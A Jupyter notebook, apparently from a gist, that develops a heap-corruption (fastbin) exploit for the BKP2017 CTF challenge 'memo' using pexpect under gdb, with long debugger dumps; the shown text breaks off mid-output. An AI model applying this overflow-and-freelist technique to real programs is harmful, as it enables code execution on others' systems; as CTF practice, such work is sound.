@P1kachu
Last active March 6, 2017 11:02
First shot at exploiting memo (BKP2017 - pwn 300): the .ipynb drives the binary under gdb, the .py runs it without gdb.
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {
"collapsed": false
},
"outputs": [],
"source": [
"import pexpect\n",
"import struct\n",
"import sys"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {
"collapsed": false
},
"outputs": [],
"source": [
"p = pexpect.spawn('gdb ./memo')\n",
"p.logfile = sys.stdout\n",
"p.setecho(False)\n",
"\n",
"\n",
"# malloc pointer\n",
"# | \n",
"# v\n",
"# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)\n",
"# malloc(2) = 0x603040 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)\n",
"# free(2) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)\n",
"# free(1) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)\n",
"# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0x424242...\n",
"# malloc(2) = 0x603040 | ...0x4242... (8 bytes) | ...0x4242... (8 bytes) | 0xDATA (32 bytes)\n",
"# malloc(0) = 0x424242.... | 0x0 (8bytes) | 0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"GNU gdb (GDB) 7.12\n",
"Copyright (C) 2016 Free Software Foundation, Inc.\n",
"License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n",
"This is free software: you are free to change and redistribute it.\n",
"There is NO WARRANTY, to the extent permitted by law. Type \"show copying\"\n",
"and \"show warranty\" for details.\n",
"This GDB was configured as \"x86_64-pc-linux-gnu\".\n",
"Type \"show configuration\" for configuration details.\n",
"For bug reporting instructions, please see:\n",
"<http://www.gnu.org/software/gdb/bugs/>.\n",
"Find the GDB manual and other documentation resources online at:\n",
"<http://www.gnu.org/software/gdb/documentation/>.\n",
"For help, type \"help\".\n",
"Type \"apropos word\" to search for commands related to \"word\"...\n",
"Reading symbols from ./memo...(no debugging symbols found)...done.\n",
"\u001b[;31mgdb-peda$ \u001b[0mb *0x400f1b\n",
"b *0x400d7b\n",
"Breakpoint 1 at 0x400f1b\n",
"\u001b[;31mgdb-peda$ \u001b[0mBreakpoint 2 at 0x400d7b\n",
"\u001b[;31mgdb-peda$ \u001b[0mb *0x400d85\n",
"r\n",
"Breakpoint 3 at 0x400d85\n",
"\u001b[;31mgdb-peda$ \u001b[0mStarting program: /home/p1kachu/Dropbox/TMP/bkp/memo \n",
"What's user name: P1kachu\n"
]
},
{
"data": {
"text/plain": [
"8"
]
},
"execution_count": 3,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"p.expect(\"done.\")\n",
"p.sendline('b *0x400f1b')\n",
"p.expect(\"peda\\$\")\n",
"p.sendline('b *0x400d7b')\n",
"p.expect(\"peda\\$\")\n",
"p.sendline('b *0x400d85')\n",
"p.expect(\"peda\\$\")\n",
"#p.sendline('python from libheap import *')\n",
"#p.expect(\"peda\\$\")\n",
"p.sendline('r')\n",
"p.expect(\"What's user name:\")\n",
"p.sendline(\"P1kachu\")"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Do you wanna set password? (y/n) y\n"
]
},
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 4,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"p.expect(\"Do you wanna set password\\? \\(y/n\\)\")\n",
"p.sendline(\"y\")"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Password must be set to 32 digits or less.\n",
"Password: /bin/sh\n",
"Done! have a good day P1kachu\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> "
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 5,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"p.expect(\"Password: \")\n",
"p.sendline(\"/bin/sh\")\n",
"p.expect(\">> \")"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"1\n",
"Index: 1\n",
"Length: 31\n",
"Message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> Invalid choice\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> 1\n",
"Index: 2\n",
"Length: 31\n",
"Message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> Invalid choice\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> "
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 6,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"SIZE=31\n",
"\n",
"# alloc(1)\n",
"p.sendline(\"1\")\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"1\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")\n",
"\n",
"\n",
"# alloc(2)\n",
"p.sendline('1')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"2\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")\n"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"4\n",
"Index: 2\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: 0x0 \n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: 0x0 \n",
"\u001b[;32mRDX\u001b[0m: 0xffffffff \n",
"\u001b[;32mRSI\u001b[0m: 0x0 \n",
"\u001b[;32mRDI\u001b[0m: \u001b[;36m0x7ffff7dd4af0\u001b[0m --> \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400f1b\u001b[0m (mov rax,QWORD PTR [rip+0x201ade] # 0x602a00)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x603040\u001b[0m --> 0x0 \n",
"\u001b[;32mR9 \u001b[0m: 0x0 \n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: \u001b[;32m0x7ffff7b87780\u001b[0m --> 0x100000000 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x206 (\u001b[;32mcarry\u001b[0m \u001b[;1;31mPARITY\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400f10:\u001b[;2m\tmov rax,QWORD PTR [rax]\u001b[0m\n",
" 0x400f13:\u001b[;2m\tmov rdi,rax\u001b[0m\n",
" 0x400f16:\u001b[;2;32m\tcall 0x400810\u001b[0m\n",
"=> 0x400f1b:\u001b[;1;32m\tmov rax,QWORD PTR [rip+0x201ade] # 0x602a00\u001b[0m\n",
" 0x400f22:\u001b[m\tshl rax,0x3\u001b[0m\n",
" 0x400f26:\u001b[m\tadd rax,0x602a70\u001b[0m\n",
" 0x400f2c:\u001b[m\tmov QWORD PTR [rax],0x0\u001b[0m\n",
" 0x400f33:\u001b[m\tmov edi,0x40141c\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011ce\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfe0\u001b[0m --> \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfe8\u001b[0m --> 0x400000000 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 1, 0x0000000000400f1b in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0mc\n",
"Continuing.\n",
"Deleted!\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> 4\n",
"Index: 1\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mRDX\u001b[0m: 0xffffffff \n",
"\u001b[;32mRSI\u001b[0m: 0x0 \n",
"\u001b[;32mRDI\u001b[0m: \u001b[;36m0x7ffff7dd4af0\u001b[0m --> \u001b[;36m0x603000\u001b[0m --> 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400f1b\u001b[0m (mov rax,QWORD PTR [rip+0x201ade] # 0x602a00)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x603010\u001b[0m --> \u001b[;36m0x603030\u001b[0m --> 0x0 \n",
"\u001b[;32mR9 \u001b[0m: 0x0 \n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: \u001b[;32m0x7ffff7b87780\u001b[0m --> 0x100000000 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x206 (\u001b[;32mcarry\u001b[0m \u001b[;1;31mPARITY\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400f10:\u001b[;2m\tmov rax,QWORD PTR [rax]\u001b[0m\n",
" 0x400f13:\u001b[;2m\tmov rdi,rax\u001b[0m\n",
" 0x400f16:\u001b[;2;32m\tcall 0x400810\u001b[0m\n",
"=> 0x400f1b:\u001b[;1;32m\tmov rax,QWORD PTR [rip+0x201ade] # 0x602a00\u001b[0m\n",
" 0x400f22:\u001b[m\tshl rax,0x3\u001b[0m\n",
" 0x400f26:\u001b[m\tadd rax,0x602a70\u001b[0m\n",
" 0x400f2c:\u001b[m\tmov QWORD PTR [rax],0x0\u001b[0m\n",
" 0x400f33:\u001b[m\tmov edi,0x40141c\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011ce\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfe0\u001b[0m --> \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfe8\u001b[0m --> 0x400000000 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 1, 0x0000000000400f1b in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0mx/4xw 0x603030\n",
"0x603030:\t0x00000000\t0x00000000\t0x00000031\t0x00000000\n",
"\u001b[;31mgdb-peda$ \u001b[0mc\n",
"Continuing.\n",
"Deleted!\n",
"\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> c\n"
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 7,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"\n",
"# free(2)\n",
"p.sendline('4')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"2\")\n",
"\n",
"p.expect(\"peda\\$\")\n",
"#p.sendline(\"heap -f\")\n",
"#p.readline()\n",
"p.sendline(\"c\")\n",
"\n",
"p.expect(\">> \")\n",
"\n",
"# free(1)\n",
"p.sendline('4')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"1\")\n",
"\n",
"p.expect(\"peda\\$\")\n",
"p.sendline(\"x/4xw 0x603030\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"\n",
"p.expect(\">> \")\n"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"(' \\x00\\x00\\x00\\x00\\x00\\x00\\x00', '`0`\\x00\\x00\\x00\\x00\\x00', '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00')\n",
"1\n",
"Invalid choice\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> Index: 1\n",
"Length: 96\n",
"message too long, you can leave on memo though\n",
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000 \u0000\u0000\u0000\u0000\u0000\u0000\u0000`0`\u0000\u0000\u0000\u0000\u0000\n",
"--->57\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: 0x39 ('9')\n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: \u001b[;31m0x7ffff7b174d0\u001b[0m (<__read_nocancel+7>:\tcmp rax,0xfffffffffffff001)\n",
"\u001b[;32mRDX\u001b[0m: 0x60 ('`')\n",
"\u001b[;32mRSI\u001b[0m: \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\n",
"\u001b[;32mRDI\u001b[0m: 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400d7b\u001b[0m (mov eax,0x0)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x7ffff7fc8400\u001b[0m (0x00007ffff7fc8400)\n",
"\u001b[;32mR9 \u001b[0m: 0x30 ('0')\n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: 0x246 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x203 (\u001b[;1;31mCARRY\u001b[0m \u001b[;32mparity\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400d6e:\u001b[;2m\tmov rsi,rax\u001b[0m\n",
" 0x400d71:\u001b[;2m\tmov edi,0x0\u001b[0m\n",
" 0x400d76:\u001b[;2;32m\tcall 0x400840\u001b[0m\n",
"=> 0x400d7b:\u001b[;1;32m\tmov eax,0x0\u001b[0m\n",
" 0x400d80:\u001b[;32m\tcall 0x4009d9\u001b[0m\n",
" 0x400d85:\u001b[;33m\tjmp 0x400da5\u001b[0m\n",
" 0x400d87:\u001b[m\tmov edi,0x40137f\u001b[0m\n",
" 0x400d8c:\u001b[;32m\tcall 0x400818\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfa8\u001b[0m --> 0x60 ('`')\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011aa\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 2, 0x0000000000400d7b in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0mx/8xw 0x603030\n",
"0x603030:\t0x00000000\t0x00000000\t0x00000020\t0x00000000\n",
"c\n",
"0x603040:\t0x00603060\t0x00000000\t0x4141410a\t0x41414141\n",
"\u001b[;31mgdb-peda$ \u001b[0mContinuing.\n",
"python from libheap import *\n",
"heap -f\n",
"c\n",
"\n",
"\u001b[;36m[----------------------------------registers-----------------------------------]\u001b[0m\n",
"\u001b[m\u001b[;32mRAX\u001b[0m: 0x1 \n",
"\u001b[;32mRBX\u001b[0m: 0x0 \n",
"\u001b[;32mRCX\u001b[0m: \u001b[;31m0x7ffff7b17530\u001b[0m (<__write_nocancel+7>:\tcmp rax,0xfffffffffffff001)\n",
"\u001b[;32mRDX\u001b[0m: \u001b[;36m0x7ffff7dd6740\u001b[0m --> 0x0 \n",
"\u001b[;32mRSI\u001b[0m: \u001b[;36m0x7ffff7dd5663\u001b[0m --> 0xdd6740000000000a \n",
"\u001b[;32mRDI\u001b[0m: 0x0 \n",
"\u001b[;32mRBP\u001b[0m: \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\n",
"\u001b[;32mRSP\u001b[0m: \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\n",
"\u001b[;32mRIP\u001b[0m: \u001b[;31m0x400d85\u001b[0m (jmp 0x400da5)\n",
"\u001b[;32mR8 \u001b[0m: \u001b[;36m0x7ffff7fc8400\u001b[0m (0x00007ffff7fc8400)\n",
"\u001b[;32mR9 \u001b[0m: 0x30 ('0')\n",
"\u001b[;32mR10\u001b[0m: 0x0 \n",
"\u001b[;32mR11\u001b[0m: 0x246 \n",
"\u001b[;32mR12\u001b[0m: \u001b[;31m0x4008a0\u001b[0m (xor ebp,ebp)\n",
"\u001b[;32mR13\u001b[0m: \u001b[;36m0x7fffffffe0d0\u001b[0m --> 0x1 \n",
"\u001b[;32mR14\u001b[0m: 0x0 \n",
"\u001b[;32mR15\u001b[0m: 0x0\u001b[0m\n",
"\u001b[m\u001b[;32mEFLAGS\u001b[0m: 0x202 (\u001b[;32mcarry\u001b[0m \u001b[;32mparity\u001b[0m \u001b[;32madjust\u001b[0m \u001b[;32mzero\u001b[0m \u001b[;32msign\u001b[0m \u001b[;32mtrap\u001b[0m \u001b[;1;31mINTERRUPT\u001b[0m \u001b[;32mdirection\u001b[0m \u001b[;32moverflow\u001b[0m)\u001b[0m\n",
"\u001b[m\u001b[;36m[-------------------------------------code-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m 0x400d76:\u001b[;2;32m\tcall 0x400840\u001b[0m\n",
" 0x400d7b:\u001b[;2m\tmov eax,0x0\u001b[0m\n",
" 0x400d80:\u001b[;2;32m\tcall 0x4009d9\u001b[0m\n",
"=> 0x400d85:\u001b[;1;32m\tjmp 0x400da5\u001b[0m\n",
" | 0x400d87:\u001b[m\tmov edi,0x40137f\u001b[0m\n",
" | 0x400d8c:\u001b[;32m\tcall 0x400818\u001b[0m\n",
" | 0x400d91:\u001b[m\tmov edi,0x1\u001b[0m\n",
" | 0x400d96:\u001b[;32m\tcall 0x400890\u001b[0m\n",
" |->\u001b[;31m 0x400da5:\tnop\u001b[0m\n",
" 0x400da6:\tleave\n",
" 0x400da7:\tret\n",
" 0x400da8:\tpush rbp\n",
"\u001b[;31m JUMP is taken\u001b[0m\u001b[0m\n",
"\u001b[m\u001b[;36m[------------------------------------stack-------------------------------------]\u001b[0m\u001b[0m\n",
"\u001b[m0000| \u001b[;36m0x7fffffffdfa0\u001b[0m --> \u001b[;36m0x603010\u001b[0m ('D' <repeats 32 times>)\u001b[0m\n",
"\u001b[m0008| \u001b[;36m0x7fffffffdfa8\u001b[0m --> 0x60 ('`')\u001b[0m\n",
"\u001b[m0016| \u001b[;36m0x7fffffffdfb0\u001b[0m --> \u001b[;36m0x7fffffffdff0\u001b[0m --> \u001b[;31m0x401200\u001b[0m (push r15)\u001b[0m\n",
"\u001b[m0024| \u001b[;36m0x7fffffffdfb8\u001b[0m --> \u001b[;31m0x4011aa\u001b[0m (jmp 0x4011f7)\u001b[0m\n",
"\u001b[m0032| \u001b[;36m0x7fffffffdfc0\u001b[0m --> 0x0 \u001b[0m\n",
"\u001b[m0040| \u001b[;36m0x7fffffffdfc8\u001b[0m --> \u001b[;36m0x7fffffffe0e8\u001b[0m --> \u001b[;36m0x7fffffffe43f\u001b[0m (\"LS_COLORS=rs=0:di=01;33:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc\"...)\u001b[0m\n",
"\u001b[m0048| \u001b[;36m0x7fffffffdfd0\u001b[0m --> \u001b[;36m0x7fffffffe0d8\u001b[0m --> \u001b[;36m0x7fffffffe41c\u001b[0m (\"/home/p1kachu/Dropbox/TMP/bkp/memo\")\u001b[0m\n",
"\u001b[m0056| \u001b[;36m0x7fffffffdfd8\u001b[0m --> 0x1004008a0 \u001b[0m\n",
"\u001b[;36m[------------------------------------------------------------------------------]\u001b[0m\n",
"\u001b[mLegend: \u001b[;31mcode\u001b[0m, \u001b[;36mdata\u001b[0m, \u001b[;32mrodata\u001b[0m, value\u001b[0m\n",
"\n",
"Breakpoint 3, 0x0000000000400d85 in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0m\u001b[;31mgdb-peda$ \u001b[0m====================================Fastbins====================================\n",
"\n",
"[ fb 0 ] 0x7ffff7dd4ae8 -> [ 0x0 ] \n",
"[ fb 1 ] 0x7ffff7dd4af0 -> [ 0x603030 ] (48)\n",
